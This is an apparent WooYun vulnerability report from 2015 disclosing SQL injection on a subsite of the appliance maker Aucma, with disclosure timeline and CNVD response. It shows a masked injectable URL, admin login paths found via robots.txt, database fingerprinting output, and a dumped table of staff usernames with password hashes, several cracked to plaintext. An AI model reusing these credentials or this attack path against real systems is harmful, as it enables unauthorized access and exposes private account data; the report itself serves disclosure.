漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0158770
漏洞标题:澳柯玛某分站存在SQL注入漏洞
相关厂商:澳柯玛
漏洞作者: cala
提交时间:2015-12-08 01:10
修复时间:2016-01-23 15:16
公开时间:2016-01-23 15:16
漏洞类型:SQL注射漏洞
危害等级:低
自评Rank:2
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-23: 细节向公众公开
简要描述:
sql注入
详细说明:
过滤不严谨,还希望厂家能尽快找编程人员修复这个漏洞
漏洞证明:
http://**.**.**.**/index.php?act=showgoods&i=355
http://**.**.**.**/cms/login.php假的后台
通过扫到的robots.txt找到的目录扫到的
http://**.**.**.**/dy/login.php 真的后台
the back-end DBMS is MySQL
web application technology: PHP 5.3.17, Apache 2.2.16
back-end DBMS: MySQL 5.0.12
| name | realname | pw |
+-----------+----------+--------------------------------------------+
| swgs | 商务公司 | 1039d5da3e52dfa8f3e95b2f8d3a9e6a |
| zxd | 中信达 | 4eb096d606a289012d07a7e35093d088 |
| seaman | NULL | dc483e80a7a0bd9ef71d8cf973673924 (a123456) |
| ss | <blank> | e99a18c428cb38d5f260853678922e03 (abc123) |
| kongtiao | 空调 | e99a18c428cb38d5f260853678922e03 (abc123) |
| shdq | 生活电器 | e99a18c428cb38d5f260853678922e03 (abc123) |
| aucma-cdw | 超 | e99a18c428cb38d5f2 |
+-----------+----------+--------------------------------------------+
| seaman | (a123456) |超级管理员,不说啥
![]Z6W~OJ6Y(H})EMH48~BIUU.png](https://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/201512/0613284229638bb1f0a4b4d1da9654b15394fa84.png)
修复方案:
版权声明:转载请注明来源 cala@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-12-11 16:58
厂商回复:
CNVD未直接复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
最新状态:
暂无